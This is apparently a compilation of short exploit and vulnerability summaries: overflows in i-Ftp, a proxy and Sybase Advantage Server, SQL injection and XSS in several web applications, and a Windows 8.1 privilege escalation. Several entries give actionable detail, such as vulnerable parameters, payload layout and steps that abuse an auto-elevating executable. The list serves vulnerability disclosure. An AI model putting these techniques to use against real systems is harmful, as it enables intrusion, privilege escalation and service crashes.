This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.
The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and a XSS vulnerability in its administrative backend. The following PHP-Scripts are prone to SQL injections: managersection.php (via sectionID parameter), edituser.php (via userID parameter), admin.php (via username parameter, BlindSQLInjection), managerrelated.php (via title parameter). The following PHP-Script is prone to XSS: managerrelated.php (via title parameter).
On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse.
This proof of concept code exploits a denial of service vulnerability in Bird Chat 1.61. The code attempts to establish multiple connections to the target server, sending a fake user name with each connection. If the server is vulnerable, it will not respond to the connection and the connection will time out. If the server is not vulnerable, it will respond with a '?' character.
This exploit allows an attacker to overwrite the system.ini file, which can cause the system to not restart. It affects all software that use the NCTWMAFile2.dll v. 2.6.2.157 ActiveX DLL, such as Sienzo DMM. It was tested on Windows XP Professional SP2 with Internet Explorer 7.
The vulnerability is a fairly trivial buffer overflow in the log_request() function of proxy.c. The exploit involves sending a GET request with a large amount of filler data followed by a call to the stack pointer, a series of NOP instructions, and the shellcode. The length of the 'Host:' field must be exactly 999 bytes for the exploit to work.
MBoard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.
The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
TCExam is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability. Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. The problem is enough unusual and affects the code that handles a certain type of packets on the UDP port. In short the server does the following: it uses memcpy to copy the data from the packet into a stack buffer of 0x400 bytes, it uses strlen to calculate the length of the data, it uses memcpy to copy the data into another stack buffer of 0x400 bytes. The problem is that the second memcpy is not limited to the length calculated by strlen and this can cause a buffer-overflow of 1 byte (the last one) if the data is longer than 0x400 bytes. The overflow can be triggered by sending a packet with a length of 0x400 bytes or more to the UDP port of the server.
Services By CQR